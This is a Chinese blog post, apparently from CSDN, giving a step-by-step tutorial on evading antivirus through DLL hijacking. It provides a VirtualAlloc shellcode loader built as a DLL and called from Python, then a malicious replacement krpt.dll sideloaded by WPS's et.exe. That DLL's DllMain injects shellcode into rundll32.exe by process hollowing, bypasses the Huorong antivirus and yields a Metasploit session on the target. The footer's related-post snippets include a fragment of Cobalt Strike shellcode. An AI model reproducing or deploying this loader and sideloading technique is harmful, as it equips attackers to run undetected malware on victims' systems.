免杀对抗-DLL劫持免杀

最新推荐文章于 2024-06-17 17:04:54 发布
最新推荐文章于 2024-06-17 17:04:54 发布
阅读量1.8k 收藏 7
点赞数 2
分类专栏: 免杀对抗 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/133544965
版权

C&Py-DLL劫持-语言-调用加载

1.使用visual studio创建项目

2.将文件名重命名为.c后缀

3.将如下加载器代码生成dll文件

加载器代码:

#include "pch.h"
#include <Windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口

unsigned char buf[] =生成的shellcode;
int main()
{
char* Memory;
Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
((void(*)())Memory)();
}

生成成功

4.msf开启监听

5.使用python执行如下代码,调用dll文件

dll.py

from ctypes import *

#利用python载入dll文件

lib=CDLL('生成的dll文件路径')

#调用dll文件内置方法函数

lib.main()

执行成功,msf成功上线

6.使用打包器将dll.py文件打包成exe,执行成功上线

 

C&C++-DLL劫持-白加黑-导出编译

1.随便选中一个exe程序运行,使用火绒剑查看这个exe程序在运行时加载的dll文件

这里选择的是wps中的et.exe程序,运行发现加载了一个krpt.dll文件

2.使用Dependencies工具对krpt.dll进行反编译

3.右键导出krpt.dll源码

4.使用visual studio 创建一个新项目。项目名称右键——打开项目位置——将反编译的dll源码复制进去。

5.选中dll源码拖入项目,工具就会自动加载源码

6.打开asm文件,将所有的jmp语句删除

7.根据文件中的教程,选中文件——右键属性——如下图修改——点击应用。

配置时注意:

配置:选择所有配置

平台:选择所有平台

8.根据教程——继续打开asm文件的属性进行配置

9.项目名称——右键属性——c/c++——代码生成——运行库——多线程(/MT)

10.预编译头——不使用预编译头

11.链接器——调试——生成调试信息——否

12..c文件中添加如下一行代码

13.打开.cpp文件,写入shellcode加载代码(可任意)

如:

#include "framework.h"
#include "krpt.h"
#include "windows.h"

BOOL APIENTRY DllMain(HMODULE hModule,
DWORD  ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{

unsigned char hexData[] = "生成的shellcode";

char* v7A = (char*)VirtualAlloc(0, _countof(hexData), 0x3000u, 0x40u);
memcpy((void*)v7A, hexData, _countof(hexData));
struct _PROCESS_INFORMATION ProcessInformation;
struct _STARTUPINFOA StartupInfo;
void* v24;
CONTEXT Context;
DWORD DwWrite = 0;
memset(&StartupInfo, 0, sizeof(StartupInfo));
StartupInfo.cb = 68;
BOOL result = CreateProcessA(0, (LPSTR)"rundll32.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation);
if (result)
{
Context.ContextFlags = 65539;
GetThreadContext(ProcessInformation.hThread, &Context);
v24 = VirtualAllocEx(ProcessInformation.hProcess, 0, _countof(hexData), 0x1000u, 0x40u);
WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, _countof(hexData), &DwWrite);
Context.Eip = (DWORD)v24;
SetThreadContext(ProcessInformation.hThread, &Context);
ResumeThread(ProcessInformation.hThread);
CloseHandle(ProcessInformation.hThread);
result = CloseHandle(ProcessInformation.hProcess);
}

TerminateProcess(GetCurrentProcess(), 0);
};

case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

成功生成dll文件

14.将生成的dll文件改名位krpt.dll和et.exe一起上传到目标系统

运行et.exe,成功绕过火绒检测,msf成功上线

xiaoheizi安全
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
2022-2024常用经典免杀技术汇总!
03-27
2022-2024常用经典免杀技术汇总!
DLL劫持C++源代码创建器
03-21
本工具自动创建用于进行DLL劫持的C++源代码。选择你正在运行的应用程序,选择应用程序加载的DLL,本工具为你创建一个用户劫持DLL的源代码。代码中有详细的指导,按照指导去配置你的VS,马上编译一个用来劫持DLL。马上下载下来试试吧。如何创建这个工具,请查看软件的帮助。
浅谈dll劫持-白加黑免杀指南
最新发布
2401_84466325的博客
06-17 1048
这就会产生事件无法得到处理,程序卡死的现象。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
DLL+Shellcode的Windows注入免杀工具
Fly_鹏程万里
05-23 459
S-inject是一款支持x86/x64的DLL和Shellcode 的Windows注入的免杀工具,支持图形化界。
网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
04-14 2033
目录一、免杀的概念二、免杀系统搭建三、免杀工具介绍1、myccl2、C32asm3、OD4、LordPE5、ImportREC6、VC++6.0/visual studio7、数字签名四、关于杀软排名不分前后1、360。2、金山毒霸3、江民4、瑞星5、安天防线6、卡巴斯基7、NOD328、诺顿9、小红伞,木伞10、BD五、杀软的查杀方法1、最基础的查杀2.1、静态启发式2.2、动态启发式3、HIPS4、云安全六、免杀方面的术语1、API2、花指令3、输入表4、区段5、加壳6、反启发7、隐藏输入表什么是免杀
DLL免杀技术探讨
goddemon
07-19 1488
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任本来不打算写免杀相关的了但是确实是忍不住想吐槽,啧啧啧,因为有一直在研究进程注入以及ring3层的bypass免杀的一些东西因为就得去给相关的文件做免杀杀的然后给某步提交了一些样本提交完不管是否公开感觉就是转手就给厂商卖钱这里公开一个样本给大家看看时间样本均是登录账户提交的均未公开14的时候是vt全过。...
反射注入dll-修改实现免杀过360
bring_coco的博客
07-05 903
getAdvapi32()函数也是LoadLibrary(“advapi32.dll”)的变形,和getKernel32作用一样,只不过是函数所在的dll不同,写成汇编形式避免检测,但是使用getAdvapi32()生成会无法注入(具体原因不清除,之后再研究吧),那么我这里注释掉,仅仅用了getKernel32函数。获得的pCFA就是原始的CreateFileA函数了,只不过被我们定义成了自己的,这样就会规避检测了,那么剩下的三处也是同样方法修改,具体参考上面给的代码。
浅谈dll劫持免杀
记录学习,一起进步
11-25 1495
浅谈dll劫持-白加黑免杀指南
网络靶场实战-免杀技术之dll注入技术详解
蛇矛实验室
12-19 1232
对于 Windows 操作系统,操作系统的大部分功能都是由 DLL 提供的。此外,当您在这些 Windows 操作系统上运行程序时,该程序的大部分功能可能由 DLL 提供。例如,一些程序可能包含许多不同的模块,程序的每个模块都包含在DLL中并分布在DLL中。DLL 的使用有助于促进代码的模块化、代码重用、有效的内存使用和减少磁盘空间。因此,操作系统和程序加载速度更快,运行速度更快,并且在计算机上占用的磁盘空间更少。当程序使用 DLL 时,称为依赖性的问题可能会导致程序无法运行。
渗透技巧 | 有手就行的白加黑实战免杀
2201_75362610的博客
06-27 1857
最近一直在打攻防,很多时候都需要用到免杀,那么怎么能快速做免杀和权限维持就是一个问题,于是就想起来利用白加黑快速做免杀或权限维持,俗称有手就行,废话不多说直接开干!
甲壳虫免杀培训技术教程
06-15
6. **行为分析与对抗**:免杀教程可能会讲解如何让恶意代码在不引起异常的情况下执行其功能,例如模拟正常用户行为,避免触发安全软件的警报。 7. **系统调用隐藏**:通过修改或劫持系统调用来隐藏恶意活动,是免杀...
能通过360、瑞星、金山、江民、卡巴、免杀大工具集合
12-30
例如,使用进程注入、DLL劫持等技术。 6. **零日攻击利用**:免杀工具集合可能包含针对反病毒软件漏洞的利用,利用这些未知的漏洞可以让恶意软件在反病毒软件更新防护之前避开检测。 7. **虚拟机逃逸**:一些反...
开启WIN7的DLL劫持支持+各种系统DLL劫持模板源码-易语言
06-12
总的来说,DLL劫持是Windows系统中的一种潜在安全风险,但通过深入理解其工作原理,结合易语言提供的源码模板,我们可以有效地预防和对抗这类攻击。同时,这也为开发者提供了一个学习和实践系统底层机制的机会,有助...
K杀软的源代码
01-20
7. **API Hooking**:劫持系统函数调用,使得杀软无法正确地监视某些关键操作,如文件读写、网络通信等。 8. **多态性和自我复制**:恶意软件可以设计成能够改变自身形态,每次执行时都略有不同,以逃避基于签名的...
木马免杀(篇三)静态免杀方法
Goodric的博客
10-31 866
绕过静态免杀的方法。即将文件上传到目标不会被杀软查杀
DLL劫持-白加黑
weixin_44747030的博客
05-06 2866
0x01 前言 DLL劫持可以用作权限维持,权限提升等作用,下面介绍一下在有杀毒软件的情况下dll劫持通过白加黑的方式获取权限,上线目标。 杀软在检测一个应用是否为病毒的时候,首先会通过黑白名单校验-病毒特征库查询-上传云查杀,在黑白名单校验阶段,如果是白名单中的应用则可以成功运行,白名单也就是有数字签名的应用,我们可以通过修改有数字签名应用中的dll,当该应用启动时会调用该dll,从而上线目标。 0x02 复现 使用cs生成shellcode 使用管理员权限打开Aheadlib+ 选择要劫持转发的dl
dll劫持
qq_46804551的博客
05-04 6003
aheadlib工具劫持 可以看见生成了一个cpp文件,然后我们创建一个dll文件 将生成的cpp文件替换到如下文件 添加#include “pch.h” 填加如下代码 /* cs的payload length: 892 bytes */ unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b
Kali渗透测试:远程控制被控端免杀DLL生成、注入反弹
Liu_Bruce的博客
05-09 3734
Kali渗透测试:远程控制被控端免杀DLL生成、注入反弹 ​ 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的方法(简称为免杀技术)。远程控制被控端也可被看作病毒的一种。 ​ 到目前为止,杀毒软件主要使用了3种技术。如下: 基于文件扫描的反病毒技术。这种技术主要依靠对程序的二进制代码进行检测,反病毒工程师将病毒样本中的一段特有的二进制代码串提取出来作为特征码,并将其加入病毒库,检测程序时看它是否包含这个特征码。 基于
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值